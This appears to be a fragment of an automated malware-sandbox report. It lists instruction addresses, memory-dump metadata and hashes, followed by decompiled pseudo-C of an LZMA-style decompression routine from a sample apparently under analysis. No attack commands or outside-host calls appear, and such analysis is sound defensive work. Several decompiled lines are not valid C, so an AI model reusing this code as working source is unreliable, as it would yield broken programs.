                                                0x0040668c
                                                0x0040668f
                                                0x00406695
                                                0x00406697
                                                0x00406697
                                                0x00406697
                                                0x0040669a
                                                0x0040669d
                                                0x00000000
                                                0x00000000
                                                0x0040626d
                                                0x0040626d
                                                0x00406271
                                                0x004069de
                                                0x00000000
                                                0x004069de
                                                0x00406277
                                                0x0040627a
                                                0x0040627d
                                                0x00406281
                                                0x00406284
                                                0x0040628a
                                                0x0040628c
                                                0x0040628c
                                                0x0040628c
                                                0x0040628f
                                                0x00406292
                                                0x00406292
                                                0x00406295
                                                0x00406298
                                                0x00000000
                                                0x00000000
                                                0x0040629e
                                                0x004062a4
                                                0x00000000
                                                0x00000000
                                                0x004062aa
                                                0x004062aa
                                                0x004062ae
                                                0x004062b1
                                                0x004062b4
                                                0x004062b7
                                                0x004062ba
                                                0x004062bb
                                                0x004062be
                                                0x004062c0
                                                0x004062c6
                                                0x004062c9
                                                0x004062cc
                                                0x004062cf
                                                0x004062d2
                                                0x004062d5
                                                0x004062d8
                                                0x004062f4
                                                0x004062f7
                                                0x004062fa
                                                0x004062fd
                                                0x00406304
                                                0x00406308
                                                0x0040630a
                                                0x0040630e
                                                0x004062da
                                                0x004062da
                                                0x004062de
                                                0x004062e6
                                                0x004062eb
                                                0x004062ed
                                                0x004062ef
                                                0x004062ef
                                                0x00406311
                                                0x00406318
                                                0x0040631b
                                                0x00000000
                                                0x00406321
                                                0x00000000
                                                0x00406321
                                                0x00000000
                                                0x00406326
                                                0x00406326
                                                0x0040632a
                                                0x004069ea
                                                0x00000000
                                                0x004069ea
                                                0x00406330
                                                0x00406333
                                                0x00406336
                                                0x0040633a
                                                0x0040633d
                                                0x00406343
                                                0x00406345
                                                0x00406345
                                                0x00406345
                                                0x00406348
                                                0x0040634b
                                                0x0040634b
                                                0x0040634b
                                                0x00406351
                                                0x00000000
                                                0x00000000
                                                0x00406353
                                                0x00406356
                                                0x00406359
                                                0x0040635c
                                                0x0040635f
                                                0x00406362
                                                0x00406365
                                                0x00406368
                                                0x0040636b
                                                0x0040636e
                                                0x00406371
                                                0x00406389
                                                0x0040638c
                                                0x0040638f
                                                0x00406392
                                                0x00406392
                                                0x00406395
                                                0x00406399
                                                0x0040639b
                                                0x00406373
                                                0x00406373
                                                0x0040637b
                                                0x00406380
                                                0x00406382
                                                0x00406384
                                                0x00406384
                                                0x0040639e
                                                0x004063a5
                                                0x004063a8
                                                0x00000000
                                                0x004063aa
                                                0x00000000
                                                0x004063aa
                                                0x004063a8
                                                0x004063af
                                                0x004063af
                                                0x004063af
                                                0x004063af
                                                0x00000000
                                                0x00000000
                                                0x004063ea
                                                0x004063ea
                                                0x004063ee
                                                0x004069f6
                                                0x00000000
                                                0x004069f6
                                                0x004063f4
                                                0x004063f7
                                                0x004063fa
                                                0x004063fe
                                                0x00406401
                                                0x00406407
                                                0x00406409
                                                0x00406409
                                                0x00406409
                                                0x0040640c
                                                0x0040640f
                                                0x0040640f
                                                0x00406415
                                                0x004063b3
                                                0x004063b3
                                                0x004063b6
                                                0x00000000
                                                0x004063b6
                                                0x00406417
                                                0x00406417
                                                0x0040641a
                                                0x0040641d
                                                0x00406420
                                                0x00406423
                                                0x00406426
                                                0x00406429
                                                0x0040642c
                                                0x0040642f
                                                0x00406432
                                                0x00406435
                                                0x0040644d
                                                0x00406450
                                                0x00406453
                                                0x00406456
                                                0x00406456
                                                0x00406459
                                                0x0040645d
                                                0x0040645f
                                                0x00406437
                                                0x00406437
                                                0x0040643f
                                                0x00406444
                                                0x00406446
                                                0x00406448
                                                0x00406448
                                                0x00406462
                                                0x00406469
                                                0x0040646c
                                                0x00000000
                                                0x0040646e
                                                0x00000000
                                                0x0040646e
                                                0x00000000
                                                0x004066fb
                                                0x004066fb
                                                0x004066ff
                                                0x00406a26
                                                0x00000000
                                                0x00406a26
                                                0x00406705
                                                0x00406708
                                                0x0040670b
                                                0x0040670f
                                                0x00406712
                                                0x00406718
                                                0x0040671a
                                                0x0040671a
                                                0x0040671a
                                                0x0040671d
                                                0x00000000
                                                0x00000000
                                                0x004064cb
                                                0x004064cb
                                                0x004064ce
                                                0x00000000
                                                0x00000000
                                                0x0040680a
                                                0x0040680e
                                                0x00406830
                                                0x00406833
                                                0x0040683d
                                                0x00406840
                                                0x00406840
                                                0x00000000
                                                0x00406840
                                                0x00406810
                                                0x00406813
                                                0x00406817
                                                0x0040681a
                                                0x0040681a
                                                0x0040681d
                                                0x00000000
                                                0x00000000
                                                0x004068c7
                                                0x004068cb
                                                0x004068e9
                                                0x004068e9
                                                0x004068e9
                                                0x004068f0
                                                0x004068f7
                                                0x004068fe
                                                0x004068fe
                                                0x00000000
                                                0x004068fe
                                                0x004068cd
                                                0x004068d0
                                                0x004068d3
                                                0x004068d6
                                                0x004068dd
                                                0x00406821
                                                0x00406821
                                                0x00406824
                                                0x00000000
                                                0x00000000
                                                0x004069b8
                                                0x004069bb
                                                0x00000000
                                                0x00000000
                                                0x004065f2
                                                0x004065f4
                                                0x004065fb
                                                0x004065fc
                                                0x004065fe
                                                0x00406601
                                                0x00000000
                                                0x00000000
                                                0x00406609
                                                0x0040660c
                                                0x0040660f
                                                0x00406611
                                                0x00406613
                                                0x00406613
                                                0x00406614
                                                0x00406617
                                                0x0040661e
                                                0x00406621
                                                0x0040662f
                                                0x00000000
                                                0x00000000
                                                0x00406905
                                                0x00406905
                                                0x00406908
                                                0x0040690f
                                                0x00000000
                                                0x00000000
                                                0x00406914
                                                0x00406914
                                                0x00406918
                                                0x00406a50
                                                0x00000000
                                                0x00406a50
                                                0x0040691e
                                                0x00406921
                                                0x00406924
                                                0x00406928
                                                0x0040692b
                                                0x00406931
                                                0x00406933
                                                0x00406933
                                                0x00406933
                                                0x00406936
                                                0x00406939
                                                0x00406939
                                                0x00406939
                                                0x00406939
                                                0x0040693c
                                                0x0040693c
                                                0x00406940
                                                0x004069a0
                                                0x004069a3
                                                0x004069a8
                                                0x004069a9
                                                0x004069ab
                                                0x004069ad
                                                0x004069b0
                                                0x004068bc
                                                0x004068bc
                                                0x00000000
                                                0x004068bc
                                                0x00406942
                                                0x00406948
                                                0x0040694b
                                                0x0040694e
                                                0x00406951
                                                0x00406954
                                                0x00406957
                                                0x0040695a
                                                0x0040695d
                                                0x00406960
                                                0x00406963
                                                0x0040697c
                                                0x0040697f
                                                0x00406982
                                                0x00406985
                                                0x00406989
                                                0x0040698b
                                                0x0040698b
                                                0x0040698c
                                                0x0040698f
                                                0x00406965
                                                0x00406965
                                                0x0040696d
                                                0x00406972
                                                0x00406974
                                                0x00406977
                                                0x00406977
                                                0x00406992
                                                0x00406999
                                                0x00000000
                                                0x0040699b
                                                0x00000000
                                                0x0040699b
                                                0x00000000
                                                0x00406637
                                                0x0040663a
                                                0x00406670
                                                0x004067a0
                                                0x004067a0
                                                0x004067a0
                                                0x004067a0
                                                0x004067a3
                                                0x004067a3
                                                0x004067a6
                                                0x004067a8
                                                0x00406a32
                                                0x00000000
                                                0x00406a32
                                                0x004067ae
                                                0x004067b1
                                                0x00000000
                                                0x00000000
                                                0x004067b7
                                                0x004067bb
                                                0x004067be
                                                0x004067be
                                                0x004067be
                                                0x00000000
                                                0x004067be
                                                0x0040663c
                                                0x0040663e
                                                0x00406640
                                                0x00406642
                                                0x00406645
                                                0x00406646
                                                0x00406648
                                                0x0040664a
                                                0x0040664d
                                                0x00406650
                                                0x00406666
                                                0x0040666b
                                                0x004066a3
                                                0x004066a3
                                                0x004066a7
                                                0x004066d3
                                                0x004066d5
                                                0x004066dc
                                                0x004066df
                                                0x004066e2
                                                0x004066e2
                                                0x004066e7
                                                0x004066e7
                                                0x004066e9
                                                0x004066ec
                                                0x004066f3
                                                0x004066f6
                                                0x00406723
                                                0x00406723
                                                0x00406726
                                                0x00406729
                                                0x0040679d
                                                0x0040679d
                                                0x0040679d
                                                0x00000000
                                                0x0040679d
                                                0x0040672b
                                                0x00406731
                                                0x00406734
                                                0x00406737
                                                0x0040673a
                                                0x0040673d
                                                0x00406740
                                                0x00406743
                                                0x00406746
                                                0x00406749
                                                0x0040674c
                                                0x00406765
                                                0x00406767
                                                0x0040676a
                                                0x0040676b
                                                0x0040676e
                                                0x00406770
                                                0x00406773
                                                0x00406775
                                                0x00406777
                                                0x0040677a
                                                0x0040677c
                                                0x0040677f
                                                0x00406783
                                                0x00406785
                                                0x00406785
                                                0x00406786
                                                0x00406789
                                                0x0040678c
                                                0x0040674e
                                                0x0040674e
                                                0x00406756
                                                0x0040675b
                                                0x0040675d
                                                0x00406760
                                                0x00406760
                                                0x0040678f
                                                0x00406796
                                                0x00406720
                                                0x00406720
                                                0x00406720

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2a04bb56d33b9fd45abb4b0c1bf3f4372dafe23577b3b22b72e760c40e3ad783
                                                • Instruction ID: b8f14fa8ad5cea51b2b9a2e46606c418b7244df3771cf842608f3b99def8c173
                                                • Opcode Fuzzy Hash: 2a04bb56d33b9fd45abb4b0c1bf3f4372dafe23577b3b22b72e760c40e3ad783
                                                • Instruction Fuzzy Hash: A3818731E00228CFDF24DFA8C8447ADBBB1FB45305F21816AD956BB281C7785A96DF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 98%
                                                			E00406473() {
                                                				signed int _t539;
                                                				unsigned short _t540;
                                                				signed int _t541;
                                                				void _t542;
                                                				signed int _t543;
                                                				signed int _t544;
                                                				signed int _t573;
                                                				signed int _t576;
                                                				signed int _t597;
                                                				signed int* _t614;
                                                				void* _t621;
                                                
                                                				L0:
                                                				while(1) {
                                                					L0:
                                                					if( *(_t621 - 0x40) != 1) {
                                                						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                                                						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                                                						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                                                						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                                                						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                                                						_t539 =  *(_t621 - 4) + 0x664;
                                                						 *(_t621 - 0x58) = _t539;
                                                						goto L68;
                                                					} else {
                                                						 *(__ebp - 0x84) = 8;
                                                						while(1) {
                                                							L132:
                                                							 *(_t621 - 0x54) = _t614;
                                                							while(1) {
                                                								L133:
                                                								_t540 =  *_t614;
                                                								_t597 = _t540 & 0x0000ffff;
                                                								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                								if( *(_t621 - 0xc) >= _t573) {
                                                									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                									 *(_t621 - 0x40) = 1;
                                                									_t541 = _t540 - (_t540 >> 5);
                                                									 *_t614 = _t541;
                                                								} else {
                                                									 *(_t621 - 0x10) = _t573;
                                                									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                								}
                                                								if( *(_t621 - 0x10) >= 0x1000000) {
                                                									goto L139;
                                                								}
                                                								L137:
                                                								if( *(_t621 - 0x6c) == 0) {
                                                									 *(_t621 - 0x88) = 5;
                                                									L170:
                                                									_t576 = 0x22;
                                                									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                                                									_t544 = 0;
                                                									L172:
                                                									return _t544;
                                                								}
                                                								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                                                								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                								L139:
                                                								_t542 =  *(_t621 - 0x84);
                                                								while(1) {
                                                									 *(_t621 - 0x88) = _t542;
                                                									while(1) {
                                                										L1:
                                                										_t543 =  *(_t621 - 0x88);
                                                										if(_t543 > 0x1c) {
                                                											break;
                                                										}
                                                										switch( *((intOrPtr*)(_t543 * 4 +  &M00406A77))) {
                                                											case 0:
                                                												if( *(_t621 - 0x6c) == 0) {
                                                													goto L170;
                                                												}
                                                												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                												_t543 =  *( *(_t621 - 0x70));
                                                												if(_t543 > 0xe1) {
                                                													goto L171;
                                                												}
                                                												_t547 = _t543 & 0x000000ff;
                                                												_push(0x2d);
                                                												asm("cdq");
                                                												_pop(_t578);
                                                												_push(9);
                                                												_pop(_t579);
                                                												_t617 = _t547 / _t578;
                                                												_t549 = _t547 % _t578 & 0x000000ff;
                                                												asm("cdq");
                                                												_t612 = _t549 % _t579 & 0x000000ff;
                                                												 *(_t621 - 0x3c) = _t612;
                                                												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                                                												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                                                												_t620 = (0x300 << _t612 + _t617) + 0x736;
                                                												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                                                													L10:
                                                													if(_t620 == 0) {
                                                														L12:
                                                														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                                                														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                														goto L15;
                                                													} else {
                                                														goto L11;
                                                													}
                                                													do {
                                                														L11:
                                                														_t620 = _t620 - 1;
                                                														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                                                													} while (_t620 != 0);
                                                													goto L12;
                                                												}
                                                												if( *(_t621 - 4) != 0) {
                                                													GlobalFree( *(_t621 - 4));
                                                												}
                                                												_t543 = GlobalAlloc(0x40, 0x600); // executed
                                                												 *(_t621 - 4) = _t543;
                                                												if(_t543 == 0) {
                                                													goto L171;
                                                												} else {
                                                													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                                                													goto L10;
                                                												}
                                                											case 1:
                                                												L13:
                                                												__eflags =  *(_t621 - 0x6c);
                                                												if( *(_t621 - 0x6c) == 0) {
                                                													 *(_t621 - 0x88) = 1;
                                                													goto L170;
                                                												}
                                                												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                                                												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                												_t45 = _t621 - 0x48;
                                                												 *_t45 =  *(_t621 - 0x48) + 1;
                                                												__eflags =  *_t45;
                                                												L15:
                                                												if( *(_t621 - 0x48) < 4) {
                                                													goto L13;
                                                												}
                                                												_t555 =  *(_t621 - 0x40);
                                                												if(_t555 ==  *(_t621 - 0x74)) {
                                                													L20:
                                                													 *(_t621 - 0x48) = 5;
                                                													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                                                													goto L23;
                                                												}
                                                												 *(_t621 - 0x74) = _t555;
                                                												if( *(_t621 - 8) != 0) {
                                                													GlobalFree( *(_t621 - 8)); // executed
                                                												}
                                                												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                                                												 *(_t621 - 8) = _t543;
                                                												if(_t543 == 0) {
                                                													goto L171;
                                                												} else {
                                                													goto L20;
                                                												}
                                                											case 2:
                                                												L24:
                                                												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                                                												 *(_t621 - 0x84) = 6;
                                                												 *(_t621 - 0x4c) = _t562;
                                                												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                                                												goto L132;
                                                											case 3:
                                                												L21:
                                                												__eflags =  *(_t621 - 0x6c);
                                                												if( *(_t621 - 0x6c) == 0) {
                                                													 *(_t621 - 0x88) = 3;
                                                													goto L170;
                                                												}
                                                												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                												_t67 = _t621 - 0x70;
                                                												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                                                												__eflags =  *_t67;
                                                												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                												L23:
                                                												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                                                												if( *(_t621 - 0x48) != 0) {
                                                													goto L21;
                                                												}
                                                												goto L24;
                                                											case 4:
                                                												L133:
                                                												_t540 =  *_t614;
                                                												_t597 = _t540 & 0x0000ffff;
                                                												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                												if( *(_t621 - 0xc) >= _t573) {
                                                													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                													 *(_t621 - 0x40) = 1;
                                                													_t541 = _t540 - (_t540 >> 5);
                                                													 *_t614 = _t541;
                                                												} else {
                                                													 *(_t621 - 0x10) = _t573;
                                                													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                												}
                                                												if( *(_t621 - 0x10) >= 0x1000000) {
                                                													goto L139;
                                                												}
                                                											case 5:
                                                												goto L137;
                                                											case 6:
                                                												__edx = 0;
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													__eax =  *(__ebp - 4);
                                                													__ecx =  *(__ebp - 0x38);
                                                													 *(__ebp - 0x34) = 1;
                                                													 *(__ebp - 0x84) = 7;
                                                													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                													L132:
                                                													 *(_t621 - 0x54) = _t614;
                                                													goto L133;
                                                												}
                                                												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                												__esi =  *(__ebp - 0x60);
                                                												__cl = 8;
                                                												__cl = 8 -  *(__ebp - 0x3c);
                                                												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                												__ecx =  *(__ebp - 0x3c);
                                                												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                												__ecx =  *(__ebp - 4);
                                                												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                												__eflags =  *(__ebp - 0x38) - 4;
                                                												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                												if( *(__ebp - 0x38) >= 4) {
                                                													__eflags =  *(__ebp - 0x38) - 0xa;
                                                													if( *(__ebp - 0x38) >= 0xa) {
                                                														_t98 = __ebp - 0x38;
                                                														 *_t98 =  *(__ebp - 0x38) - 6;
                                                														__eflags =  *_t98;
                                                													} else {
                                                														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                													}
                                                												} else {
                                                													 *(__ebp - 0x38) = 0;
                                                												}
                                                												__eflags =  *(__ebp - 0x34) - __edx;
                                                												if( *(__ebp - 0x34) == __edx) {
                                                													__ebx = 0;
                                                													__ebx = 1;
                                                													goto L61;
                                                												} else {
                                                													__eax =  *(__ebp - 0x14);
                                                													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                													__eflags = __eax -  *(__ebp - 0x74);
                                                													if(__eax >=  *(__ebp - 0x74)) {
                                                														__eax = __eax +  *(__ebp - 0x74);
                                                														__eflags = __eax;
                                                													}
                                                													__ecx =  *(__ebp - 8);
                                                													__ebx = 0;
                                                													__ebx = 1;
                                                													__al =  *((intOrPtr*)(__eax + __ecx));
                                                													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                													goto L41;
                                                												}
                                                											case 7:
                                                												goto L0;
                                                											case 8:
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													__eax =  *(__ebp - 4);
                                                													__ecx =  *(__ebp - 0x38);
                                                													 *(__ebp - 0x84) = 0xa;
                                                													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                												} else {
                                                													__eax =  *(__ebp - 0x38);
                                                													__ecx =  *(__ebp - 4);
                                                													__eax =  *(__ebp - 0x38) + 0xf;
                                                													 *(__ebp - 0x84) = 9;
                                                													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                												}
                                                												while(1) {
                                                													L132:
                                                													 *(_t621 - 0x54) = _t614;
                                                													goto L133;
                                                												}
                                                											case 9:
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													goto L89;
                                                												}
                                                												__eflags =  *(__ebp - 0x60);
                                                												if( *(__ebp - 0x60) == 0) {
                                                													goto L171;
                                                												}
                                                												__eax = 0;
                                                												__eflags =  *(__ebp - 0x38) - 7;
                                                												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                												__eflags = _t258;
                                                												0 | _t258 = _t258 + _t258 + 9;
                                                												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                												goto L75;
                                                											case 0xa:
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													__eax =  *(__ebp - 4);
                                                													__ecx =  *(__ebp - 0x38);
                                                													 *(__ebp - 0x84) = 0xb;
                                                													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                													while(1) {
                                                														L132:
                                                														 *(_t621 - 0x54) = _t614;
                                                														goto L133;
                                                													}
                                                												}
                                                												__eax =  *(__ebp - 0x28);
                                                												goto L88;
                                                											case 0xb:
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													__ecx =  *(__ebp - 0x24);
                                                													__eax =  *(__ebp - 0x20);
                                                													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                												} else {
                                                													__eax =  *(__ebp - 0x24);
                                                												}
                                                												__ecx =  *(__ebp - 0x28);
                                                												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                												L88:
                                                												__ecx =  *(__ebp - 0x2c);
                                                												 *(__ebp - 0x2c) = __eax;
                                                												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                												L89:
                                                												__eax =  *(__ebp - 4);
                                                												 *(__ebp - 0x80) = 0x15;
                                                												__eax =  *(__ebp - 4) + 0xa68;
                                                												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                												goto L68;
                                                											case 0xc:
                                                												L99:
                                                												__eflags =  *(__ebp - 0x6c);
                                                												if( *(__ebp - 0x6c) == 0) {
                                                													 *(__ebp - 0x88) = 0xc;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x70);
                                                												__eax =  *(__ebp - 0xc);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												_t334 = __ebp - 0x70;
                                                												 *_t334 =  *(__ebp - 0x70) + 1;
                                                												__eflags =  *_t334;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												__eax =  *(__ebp - 0x2c);
                                                												goto L101;
                                                											case 0xd:
                                                												L37:
                                                												__eflags =  *(__ebp - 0x6c);
                                                												if( *(__ebp - 0x6c) == 0) {
                                                													 *(__ebp - 0x88) = 0xd;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x70);
                                                												__eax =  *(__ebp - 0xc);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												_t122 = __ebp - 0x70;
                                                												 *_t122 =  *(__ebp - 0x70) + 1;
                                                												__eflags =  *_t122;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												L39:
                                                												__eax =  *(__ebp - 0x40);
                                                												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                													goto L48;
                                                												}
                                                												__eflags = __ebx - 0x100;
                                                												if(__ebx >= 0x100) {
                                                													goto L54;
                                                												}
                                                												L41:
                                                												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                												__ecx =  *(__ebp - 0x58);
                                                												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                												 *(__ebp - 0x48) = __eax;
                                                												__eax = __eax + 1;
                                                												__eax = __eax << 8;
                                                												__eax = __eax + __ebx;
                                                												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                												__ax =  *__esi;
                                                												 *(__ebp - 0x54) = __esi;
                                                												__edx = __ax & 0x0000ffff;
                                                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                												__eflags =  *(__ebp - 0xc) - __ecx;
                                                												if( *(__ebp - 0xc) >= __ecx) {
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                													__cx = __ax;
                                                													 *(__ebp - 0x40) = 1;
                                                													__cx = __ax >> 5;
                                                													__eflags = __eax;
                                                													__ebx = __ebx + __ebx + 1;
                                                													 *__esi = __ax;
                                                												} else {
                                                													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                													 *(__ebp - 0x10) = __ecx;
                                                													0x800 = 0x800 - __edx;
                                                													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                													__ebx = __ebx + __ebx;
                                                													 *__esi = __cx;
                                                												}
                                                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                												 *(__ebp - 0x44) = __ebx;
                                                												if( *(__ebp - 0x10) >= 0x1000000) {
                                                													goto L39;
                                                												} else {
                                                													goto L37;
                                                												}
                                                											case 0xe:
                                                												L46:
                                                												__eflags =  *(__ebp - 0x6c);
                                                												if( *(__ebp - 0x6c) == 0) {
                                                													 *(__ebp - 0x88) = 0xe;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x70);
                                                												__eax =  *(__ebp - 0xc);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												_t156 = __ebp - 0x70;
                                                												 *_t156 =  *(__ebp - 0x70) + 1;
                                                												__eflags =  *_t156;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												while(1) {
